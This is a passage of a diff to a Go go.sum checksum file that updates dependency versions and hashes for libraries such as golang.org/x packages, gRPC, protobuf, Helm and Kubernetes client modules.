+go.opentelemetry.io/otel/sdk v1.22.0 h1:6coWHw9xw7EfClIC/+O31R8IY3/+EiRFHevmHafB2Gw= +go.opentelemetry.io/otel/sdk v1.22.0/go.mod h1:iu7luyVGYovrRpe2fmj3CVKouQNdTOkxtLzPvPz1DOc= +go.opentelemetry.io/otel/trace v1.24.0 h1:CsKnnL4dUAr/0llH9FKuc698G04IrpWV0MQA/Y1YELI= +go.opentelemetry.io/otel/trace v1.24.0/go.mod h1:HPc3Xr/cOApsBI154IU0OI0HJexz+aw5uPdbs3UCjNU= go.starlark.net v0.0.0-20230525235612-a134d8f9ddca h1:VdD38733bfYv5tUZwEIskMM93VanwNIi5bIKnDrJdEY= go.starlark.net v0.0.0-20230525235612-a134d8f9ddca/go.mod h1:jxU+3+j+71eXOW14274+SmmuW82qJzl6iZSeqEtTGds= go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= go.uber.org/goleak v1.1.11/go.mod h1:cwTWslyiVhfpKIDGSZEM2HlOvcqm+tG4zioyIeLoqMQ= -go.uber.org/goleak v1.2.0 h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk= -go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo= +go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto= +go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE= go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0= go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y= go.uber.org/zap v1.24.0/go.mod h1:2kMP+WWQ8aoFoedH3T2sq6iJ2yDWpHbP0f6MQbS9Gkg= -go.uber.org/zap v1.26.0 h1:sI7k6L95XOKS281NhVKOFCUNIvv9e0w4BF8N3u+tCRo= -go.uber.org/zap v1.26.0/go.mod h1:dtElttAiwGvoJ/vj4IwHBS/gXsEu/pZ50mUIRWuG0so= +go.uber.org/zap v1.27.0 h1:aJMhYGrd5QSmlpLMr2MftRKl7t8J8PTZPA732ud/XR8= +go.uber.org/zap v1.27.0/go.mod h1:GB2qFLM7cTU87MWRP2mPIjqfIDnGu+VIO4V/SdhGo2E= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= @@ -502,8 +515,8 @@ golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0 golang.org/x/crypto v0.3.0/go.mod h1:hebNnKkNXi2UzZN1eVRvBB7co0a+JxK6XbPiWVs/3J4= golang.org/x/crypto v0.3.1-0.20221117191849-2c476679df9a/go.mod h1:hebNnKkNXi2UzZN1eVRvBB7co0a+JxK6XbPiWVs/3J4= golang.org/x/crypto v0.7.0/go.mod h1:pYwdfH91IfpZVANVyUOhSIPZaFoJGxTFbZhFTx+dXZU= -golang.org/x/crypto v0.18.0 h1:PGVlW0xEltQnzFZ55hkuX5+KLyrMYhHld1YHO4AKcdc= -golang.org/x/crypto v0.18.0/go.mod h1:R0j02AL6hcrfOiy9T4ZYp/rcWeMxM3L6QYxlOuEG1mg= +golang.org/x/crypto v0.22.0 h1:g1v0xeRhjcugydODzvb3mEM9SQ0HGp9s/nh3COQ/C30= +golang.org/x/crypto v0.22.0/go.mod h1:vr6Su+7cTlO45qkww3VDJlzDn0ctJvRgYbC2NvXHt+M= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= @@ -517,14 +530,13 @@ golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.5.1/go.mod h1:5OXOZSfqPIIbmVBIIKWRFfZjPR0E5r58TLhUjH0a2Ro= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= -golang.org/x/mod v0.14.0 h1:dGoOF9QVLYng8IHTm7BAyWqCqSheQ5pYWGhzW00YJr0= -golang.org/x/mod v0.14.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= +golang.org/x/mod v0.17.0 h1:zY54UmvipHiNd+pm+m0x9KhZ9hl1/7QNMyxXbc6ICqA= +golang.org/x/mod v0.17.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= @@ -537,22 +549,21 @@ golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug golang.org/x/net v0.2.0/go.mod h1:KqCZLdyyvdV855qA2rE3GC2aiw5xGR5TEjj8smXukLY= golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.8.0/go.mod h1:QVkue5JL9kW//ek3r6jTKnTFis1tRmNAW2P1shuFdJc= -golang.org/x/net v0.20.0 h1:aCL9BSgETF1k+blQaYUBx9hJ9LOGP3gAVemcZlf1Kpo= -golang.org/x/net v0.20.0/go.mod h1:z8BVo6PvndSri0LbOE3hAn0apkU+1YvI6E70E9jsnvY= +golang.org/x/net v0.24.0 h1:1PcaxkF854Fu3+lvBIx5SYn9wRlBzzcnHZSiaFFAb0w= +golang.org/x/net v0.24.0/go.mod h1:2Q7sJY5mzlzWjKtYUEXSlBWCdyaioyXzRB2RtU8KVE8= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= -golang.org/x/oauth2 v0.15.0 h1:s8pnnxNVzjWyrvYdFUQq5llS1PX2zhPXmccZv99h7uQ= -golang.org/x/oauth2 v0.15.0/go.mod h1:q48ptWNTY5XWf+JNten23lcvHpLJ0ZSxF5ttTHKVCAM= +golang.org/x/oauth2 v0.18.0 h1:09qnuIAgzdx1XplqJvW6CQqMCtGZykZWcXzPMPUusvI= +golang.org/x/oauth2 v0.18.0/go.mod h1:Wf7knwG0MPoWIMMBgFlEaSUDaKskp0dCfrlJRJXbBi8= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.6.0 h1:5BMeUDZ7vkXGfEr1x9B4bRcTH4lpkTkpdh0T/J+qjbQ= -golang.org/x/sync v0.6.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= +golang.org/x/sync v0.7.0 h1:YsImfSBoP9QPYL0xyKJPq0gcaJdG3rInoqxTWbfQu9M= +golang.org/x/sync v0.7.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= @@ -580,22 +591,22 @@ golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.8.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.11.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= -golang.org/x/sys v0.15.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= -golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= -golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= +golang.org/x/sys v0.19.0 h1:q5f1RH2jigJ1MoAWp2KTp3gm5zAGFUTarQZ5U386+4o= +golang.org/x/sys v0.19.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.0.0-20220526004731-065cf7ba2467/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.2.0/go.mod h1:TVmDHMZPmdnySmBfhjOoOdhjzdE1h4u1VwSiw2l1Nuc= golang.org/x/term v0.5.0/go.mod h1:jMB1sMXY+tzblOD4FWmEbocvup2/aLOaQEp7JmGp78k= golang.org/x/term v0.6.0/go.mod h1:m6U89DPEgQRMq3DNkDClhWw02AUbt2daBVO4cn4Hv9U= -golang.org/x/term v0.16.0 h1:m+B6fahuftsE9qjo0VWp2FW0mB3MTJvR0BaMQrq0pmE= -golang.org/x/term v0.16.0/go.mod h1:yn7UURbUtPyrVJPGPq404EukNFxcm/foM+bV/bfcDsY= +golang.org/x/term v0.19.0 h1:+ThwsDv+tYfnJFhF4L8jITxu1tdTWRTZpdsWgEgjL6Q= +golang.org/x/term v0.19.0/go.mod h1:2CuTdWZ7KHSQwUzKva0cbMg6q2DMI3Mmxp+gKJbskEk= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= +golang.org/x/text v0.3.8/go.mod h1:E6s5w1FMmriuDzIBO73fBruAKo1PCIq6d2Q6DHfQ8WQ= golang.org/x/text v0.4.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.8.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= @@ -617,36 +628,36 @@ golang.org/x/tools v0.1.5/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/tools v0.1.7/go.mod h1:LGqMHiF4EqQNHR1JncWGqT5BVaXmza+X+BDGol+dOxo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= -golang.org/x/tools v0.17.0 h1:FvmRgNOcs3kOa+T20R1uhfP9F6HgG2mfxDv1vrx1Htc= -golang.org/x/tools v0.17.0/go.mod h1:xsh6VxdV005rRVaS6SSAf9oiAqljS7UZUacMZ8Bnsps= +golang.org/x/tools v0.20.0 h1:hz/CVckiOxybQvFw6h7b/q80NTr9IUQb4s1IIzW7KNY= +golang.org/x/tools v0.20.0/go.mod h1:WvitBU7JJf6A4jOdg4S1tviW9bhUxkgeCui/0JHctQg= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 h1:H2TDz8ibqkAF6YGhCdN3jS9O0/s90v0rJh3X/OLHEUk= -golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2/go.mod h1:K8+ghG5WaK9qNqU5K3HdILfMLy1f3aNYFI/wnl100a8= -google.golang.org/api v0.152.0 h1:t0r1vPnfMc260S2Ci+en7kfCZaLOPs5KI0sVV/6jZrY= -google.golang.org/api v0.152.0/go.mod h1:3qNJX5eOmhiWYc67jRA/3GsDw97UFb5ivv7Y2PrriAY= +golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028 h1:+cNy6SZtPcJQH3LJVLOSmiC7MMxXNOb3PU/VUEz+EhU= +golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= +google.golang.org/api v0.171.0 h1:w174hnBPqut76FzW5Qaupt7zY8Kql6fiVjgys4f58sU= +google.golang.org/api v0.171.0/go.mod h1:Hnq5AHm4OTMt2BUVjael2CWZFD6vksJdWCWiUAmjC9o= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= -google.golang.org/appengine v1.6.7 h1:FZR1q0exgwxzPzp/aF+VccGrSfxfPpkBqjIIEq3ru6c= -google.golang.org/appengine v1.6.7/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc= +google.golang.org/appengine v1.6.8 h1:IhEN5q69dyKagZPYMSdIjS2HqprW324FRQZJcGqPAsM= +google.golang.org/appengine v1.6.8/go.mod h1:1jJ3jBArFh5pcgW8gCtRJnepW8FzD1V44FJffLiz/Ds= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= -google.golang.org/genproto v0.0.0-20231106174013-bbf56f31fb17 h1:wpZ8pe2x1Q3f2KyT5f8oP/fa9rHAKgFPr/HZdNuS+PQ= -google.golang.org/genproto v0.0.0-20231106174013-bbf56f31fb17/go.mod h1:J7XzRzVy1+IPwWHZUzoD0IccYZIrXILAQpc+Qy9CMhY= -google.golang.org/genproto/googleapis/api v0.0.0-20231106174013-bbf56f31fb17 h1:JpwMPBpFN3uKhdaekDpiNlImDdkUAyiJ6ez/uxGaUSo= -google.golang.org/genproto/googleapis/api v0.0.0-20231106174013-bbf56f31fb17/go.mod h1:0xJLfVdJqpAPl8tDg1ujOCGzx6LFLttXT5NhllGOXY4= -google.golang.org/genproto/googleapis/rpc v0.0.0-20231120223509-83a465c0220f h1:ultW7fxlIvee4HYrtnaRPon9HpEgFk5zYpmfMgtKB5I= -google.golang.org/genproto/googleapis/rpc v0.0.0-20231120223509-83a465c0220f/go.mod h1:L9KNLi232K1/xB6f7AlSX692koaRnKaWSR0stBki0Yc= +google.golang.org/genproto v0.0.0-20240213162025-012b6fc9bca9 h1:9+tzLLstTlPTRyJTh+ah5wIMsBW5c4tQwGTN3thOW9Y= +google.golang.org/genproto v0.0.0-20240213162025-012b6fc9bca9/go.mod h1:mqHbVIp48Muh7Ywss/AD6I5kNVKZMmAa/QEW58Gxp2s= +google.golang.org/genproto/googleapis/api v0.0.0-20240314234333-6e1732d8331c h1:kaI7oewGK5YnVwj+Y+EJBO/YN1ht8iTL9XkFHtVZLsc= +google.golang.org/genproto/googleapis/api v0.0.0-20240314234333-6e1732d8331c/go.mod h1:VQW3tUculP/D4B+xVCo+VgSq8As6wA9ZjHl//pmk+6s= +google.golang.org/genproto/googleapis/rpc v0.0.0-20240314234333-6e1732d8331c h1:lfpJ/2rWPa/kJgxyyXM8PrNnfCzcmxJ265mADgwmvLI= +google.golang.org/genproto/googleapis/rpc v0.0.0-20240314234333-6e1732d8331c/go.mod h1:WtryC6hu0hhx87FDGxWCDptyssuo68sk10vYjF+T9fY= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= -google.golang.org/grpc v1.59.0 h1:Z5Iec2pjwb+LEOqzpB2MR12/eKFhDPhuqW91O+4bwUk= -google.golang.org/grpc v1.59.0/go.mod h1:aUPDwccQo6OTjy7Hct4AfBPD1GptF4fyUjIkQ9YtF98= +google.golang.org/grpc v1.62.1 h1:B4n+nfKzOICUXMgyrNd19h/I9oH0L1pizfk1d4zSgTk= +google.golang.org/grpc v1.62.1/go.mod h1:IWTG0VlJLCh1SkC58F7np9ka9mx/WNkjl4PGJaiq+QE= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= @@ -658,15 +669,15 @@ google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpAD google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= -google.golang.org/protobuf v1.31.0 h1:g0LDEJHgrBl9N9r17Ru3sqWhkIx2NB67okBHPwC7hs8= -google.golang.org/protobuf v1.31.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= +google.golang.org/protobuf v1.33.0 h1:uNO2rsAINq/JlFpSdYEKIZ0uKD/R9cpdv0T+yoGwGmI= +google.golang.org/protobuf v1.33.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20200227125254-8fa46927fb4f/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= -gopkg.in/dnaeon/go-vcr.v3 v3.1.2 h1:F1smfXBqQqwpVifDfUBQG6zzaGjzT+EnVZakrOdr5wA= -gopkg.in/dnaeon/go-vcr.v3 v3.1.2/go.mod h1:2IMOnnlx9I6u9x+YBsM3tAMx6AlOxnJ0pWxQAzZ79Ag= +gopkg.in/dnaeon/go-vcr.v3 v3.2.0 h1:Rltp0Vf+Aq0u4rQXgmXgtgoRDStTnFN83cWgSGSoRzM= +gopkg.in/dnaeon/go-vcr.v3 v3.2.0/go.mod h1:2IMOnnlx9I6u9x+YBsM3tAMx6AlOxnJ0pWxQAzZ79Ag= gopkg.in/hjson/hjson-go.v3 v3.0.1/go.mod h1:X6zrTSVeImfwfZLfgQdInl9mWjqPqgH90jom9nym/lw= gopkg.in/inf.v0 v0.9.1 h1:73M5CoZyi3ZLMOyDlQh031Cx6N9NDJ2Vvfl76EDAgDc= gopkg.in/inf.v0 v0.9.1/go.mod h1:cWUDdTG/fYaXco+Dcufb5Vnc6Gp2YChqWtbxRZE0mXw= @@ -682,22 +693,22 @@ gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C gopkg.in/yaml.v3 v3.0.0-20200605160147-a5ece683394c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= -helm.sh/helm/v3 v3.14.0 h1:TaZIH6uOchn7L27ptwnnuHJiFrT/BsD4dFdp/HLT2nM= -helm.sh/helm/v3 v3.14.0/go.mod h1:2itvvDv2WSZXTllknfQo6j7u3VVgMAvm8POCDgYH424= +helm.sh/helm/v3 v3.14.3 h1:HmvRJlwyyt9HjgmAuxHbHv3PhMz9ir/XNWHyXfmnOP4= +helm.sh/helm/v3 v3.14.3/go.mod h1:v6myVbyseSBJTzhmeE39UcPLNv6cQK6qss3dvgAySaE= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= howett.net/plist v1.0.0 h1:7CrbWYbPPO/PyNy38b2EB/+gYbjCe2DXBxgtOOZbSQM= howett.net/plist v1.0.0/go.mod h1:lqaXoTrLY4hg8tnEzNru53gicrbv7rrk+2xJA/7hw9g= -k8s.io/api v0.29.1 h1:DAjwWX/9YT7NQD4INu49ROJuZAAAP/Ijki48GUPzxqw= -k8s.io/api v0.29.1/go.mod h1:7Kl10vBRUXhnQQI8YR/R327zXC8eJ7887/+Ybta+RoQ= +k8s.io/api v0.29.3 h1:2ORfZ7+bGC3YJqGpV0KSDDEVf8hdGQ6A03/50vj8pmw= +k8s.io/api v0.29.3/go.mod h1:y2yg2NTyHUUkIoTC+phinTnEa3KFM6RZ3szxt014a80= k8s.io/apiextensions-apiserver v0.29.0 h1:0VuspFG7Hj+SxyF/Z/2T0uFbI5gb5LRgEyUVE3Q4lV0= k8s.io/apiextensions-apiserver v0.29.0/go.mod h1:TKmpy3bTS0mr9pylH0nOt/QzQRrW7/h7yLdRForMZwc= -k8s.io/apimachinery v0.29.1 h1:KY4/E6km/wLBguvCZv8cKTeOwwOBqFNjwJIdMkMbbRc= -k8s.io/apimachinery v0.29.1/go.mod h1:6HVkd1FwxIagpYrHSwJlQqZI3G9LfYWRPAkUvLnXTKU= -k8s.io/cli-runtime v0.29.1 h1:By3WVOlEWYfyxhGko0f/IuAOLQcbBSMzwSaDren2JUs= -k8s.io/cli-runtime v0.29.1/go.mod h1:vjEY9slFp8j8UoMhV5AlO8uulX9xk6ogfIesHobyBDU= -k8s.io/client-go v0.29.1 h1:19B/+2NGEwnFLzt0uB5kNJnfTsbV8w6TgQRz9l7ti7A= -k8s.io/client-go v0.29.1/go.mod h1:TDG/psL9hdet0TI9mGyHJSgRkW3H9JZk2dNEUS7bRks= +k8s.io/apimachinery v0.29.3 h1:2tbx+5L7RNvqJjn7RIuIKu9XTsIZ9Z5wX2G22XAa5EU= +k8s.io/apimachinery v0.29.3/go.mod h1:hx/S4V2PNW4OMg3WizRrHutyB5la0iCUbZym+W0EQIU= +k8s.io/cli-runtime v0.29.3 h1:r68rephmmytoywkw2MyJ+CxjpasJDQY7AGc3XY2iv1k= +k8s.io/cli-runtime v0.29.3/go.mod h1:aqVUsk86/RhaGJwDhHXH0jcdqBrgdF3bZWk4Z9D4mkM= +k8s.io/client-go v0.29.3 h1:R/zaZbEAxqComZ9FHeQwOh3Y1ZUs7FaHKZdQtIc2WZg= +k8s.io/client-go v0.29.3/go.mod h1:tkDisCvgPfiRpxGnOORfkljmS+UrW+WtXAy2fTvXJB0= k8s.io/component-base v0.29.0 